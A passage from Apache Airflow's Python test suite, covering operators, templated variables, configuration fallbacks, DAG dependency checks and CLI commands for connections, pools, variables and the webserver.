t2.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_error_delta_and_fn(self):
"""
Test that providing execution_delta and a function raises an error
"""
with self.assertRaises(ValueError):
t = sensors.ExternalTaskSensor(
task_id='test_external_task_sensor_check_delta',
external_dag_id=TEST_DAG_ID,
external_task_id='time_sensor_check',
execution_delta=timedelta(0),
execution_date_fn=lambda dt: dt,
allowed_states=['success'],
dag=self.dag)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1], context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
on_success_callback=verify_templated_field,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'success':False,
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
val['success'] = True
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
on_success_callback=verify_templated_field,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
self.assertTrue(val['success'])
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'success': False,
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
val['success'] = True
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
on_success_callback=verify_templated_field,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
self.assertTrue(val['success'])
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'success': False,
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
u'{"foo": "bar"}')
val['success'] = True
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
on_success_callback=verify_templated_field,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
self.assertTrue(val['success'])
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject(object):
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_doctests(self):
modules = [utils, macros]
for mod in modules:
failed, tests = doctest.testmod(mod)
if failed:
raise Exception("Failed a doctest")
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check the returned value, and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(configuration.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.get('core', 'FERNET_KEY')
configuration.set("core", "FERNET_KEY_CMD", "printf HELLO")
FALLBACK_FERNET_KEY = configuration.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
# restore the conf back to the original state
configuration.remove_option("core", "FERNET_KEY_CMD")
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(configuration.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.get("core", "FERNET_KEY")
configuration.remove_option("core", "FERNET_KEY")
with self.assertRaises(AirflowConfigException) as cm:
configuration.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
# restore the conf back to the original state
configuration.set("core", "FERNET_KEY", FERNET_KEY)
self.assertTrue(configuration.has_option("core", "FERNET_KEY"))
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_duplicate_dependencies(self):
regexp = "Dependency (.*)runme_0(.*)run_after_loop(.*) " \
"already registered"
with self.assertRaisesRegexp(AirflowException, regexp):
self.runme_0.set_downstream(self.run_after_loop)
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_after_loop.set_upstream(self.runme_0)
def test_cyclic_dependencies_1(self):
regexp = "Cycle detected in DAG. (.*)runme_0(.*)"
with self.assertRaisesRegexp(AirflowException, regexp):
self.runme_0.set_upstream(self.run_after_loop)
def test_cyclic_dependencies_2(self):
regexp = "Cycle detected in DAG. (.*)run_after_loop(.*)"
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_after_loop.set_downstream(self.runme_0)
def test_cyclic_dependencies_3(self):
regexp = "Cycle detected in DAG. (.*)run_this_last(.*)"
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_this_last.set_downstream(self.runme_0)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existant",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = models.TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = (
session.query(TI)
.filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE)
.one()
)
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
p_fails = session.query(models.TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(models.TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
print(f_fails)
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
# C
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_dag_stats(self):
"""Correctly sets/dirties/cleans rows of DagStat table"""
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
models.DagStat.update([], session=session)
run1 = self.dag_bash.create_dagrun(
run_id="run1",
execution_date=DEFAULT_DATE,
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 1)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
run2 = self.dag_bash.create_dagrun(
run_id="run2",
execution_date=DEFAULT_DATE+timedelta(days=1),
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 2)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
session.query(models.DagRun).first().state = State.SUCCESS
session.commit()
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.SUCCESS).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.SUCCESS, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.RUNNING).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.RUNNING, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
session.close()
def test_run_command(self):
if six.PY3:
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
else:
write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)),
u'\u1000foo' if six.PY3 else 'foo')
self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
class CliTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(CliTests, cls).setUpClass()
cls._cleanup()
def setUp(self):
super(CliTests, self).setUp()
configuration.load_test_config()
app = application.create_app()
app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True)
self.session = Session()
def tearDown(self):
self._cleanup(session=self.session)
super(CliTests, self).tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(models.Pool).delete()
session.query(models.Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
@mock.patch("airflow.bin.cli.db_utils.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with()
@mock.patch("airflow.bin.cli.db_utils.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with()
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
conns = [[x.strip("'") for x in re.findall("'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['beeline_default', 'beeline'], conns)
self.assertIn(['bigquery_default', 'bigquery'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', 'conn_type', 'conn_host', 'conn_login', 'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
# Prepare to add connections
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
# Add connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session
.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
# Attempt to delete a non-existing connnection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator', '-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_backfill(self):
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-t', 'runme_0', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-l',
'-s', DEFAULT_DATE.isoformat()]))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(models.Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(models.Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
os.remove('variables1.json')
os.remove('variables2.json')
def _wait_pidfile(self, pidfile):
while True:
try:
with open(pidfile) as f:
return int(f.read())
except:
sleep(1)
def test_cli_webserver_foreground(self):
import subprocess
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
import subprocess
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import subprocess
import psutil
# Confirm that webserver hasn't been launched.
